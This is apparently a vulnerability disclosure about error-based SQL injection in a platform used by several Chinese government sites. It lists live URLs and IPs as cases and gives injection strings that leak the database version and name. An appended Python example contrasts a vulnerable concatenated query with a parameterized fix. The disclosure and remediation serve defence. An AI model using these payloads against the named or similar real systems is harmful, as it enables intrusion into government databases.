### Brief description:

See title.

### Details:

Generic SQL injection in a system used by government sites, #9.

Cases:

- http://www.lgqzwfw.gov.cn/xspww/InteractiveCommunication/InterActiveIndex.aspx
- http://60.215.8.148:6006//InteractiveCommunication/InterActiveIndex.aspx
- http://www.lgqzwfw.gov.cn/xspww/InteractiveCommunication/InterActiveIndex.aspx
- http://shenpi.dongying.gov.cn/fabu/InteractiveCommunication/InterActiveIndex.aspx
- http://222.135.78.34:8086/InteractiveCommunication/InterActiveIndex.aspx

### Proof of vulnerability:

Proof:

http://www.lgqzwfw.gov.cn/xspww/InteractiveCommunication/InterActiveIndex.aspx

Search for: a single quote

![QQ图片20150602132249.png](https://images.seebug.org/upload/201506/021326471282d9f2847d9fba9e7cc8c3ec4ff217.png)

Searching for `1' and @@version=1 and '%'='` raises an error that exposes the database version

![QQ图片20150602132324.png](https://images.seebug.org/upload/201506/02132656ca69c655cd5f8030c7aaeed9912f833e.png)

Searching for `1' and db_name()=1 and '%'='` raises an error that exposes the database table name

![QQ图片20150602132405.png](https://images.seebug.org/upload/201506/021327036b1bdafec7fc26d9cca8aaa033f1291a.png)
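The trailing `and '%'='` in the search strings above suggests the keyword is spliced into a `LIKE '%...%'` clause. The following is an added example, not code from the report or the affected system: it places that assumed query shape beside a parameterized version, with Python's `sqlite3` standing in for the SQL Server backend and all table names, function names and rows constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; sqlite3 stands in for the real backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO messages (title) VALUES (?)",
                   [("Permit inquiry 1",), ("Road repair",), ("100% refund",)])
    return db

def search_concatenated(db, keyword):
    # Assumed vulnerable shape: user input spliced inside LIKE '%...%'.
    sql = "SELECT title FROM messages WHERE title LIKE '%" + keyword + "%'"
    return [row[0] for row in db.execute(sql)]

def escape_like(keyword, esc="\\"):
    # Escape LIKE wildcards so the keyword is matched literally.
    for ch in (esc, "%", "_"):
        keyword = keyword.replace(ch, esc + ch)
    return keyword

def search_parameterized(db, keyword):
    # The keyword is bound as data and never becomes part of the SQL text.
    sql = "SELECT title FROM messages WHERE title LIKE ? ESCAPE '\\'"
    pattern = "%" + escape_like(keyword) + "%"
    return [row[0] for row in db.execute(sql, (pattern,))]

def probe(search, db, keyword):
    # ("error", message) if the database rejects the statement,
    # otherwise ("rows", matching titles).
    try:
        return ("rows", search(db, keyword))
    except sqlite3.Error as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    db = make_db()
    for kw in ["'", "1' and @@version=1 and '%'='", "Permit"]:
        print(repr(kw), probe(search_concatenated, db, kw)[0],
              probe(search_parameterized, db, kw))
```

In ASP.NET the equivalent fix is a `SqlCommand` with `SqlParameter` values, combined with custom error pages so that database error text is not returned to the browser.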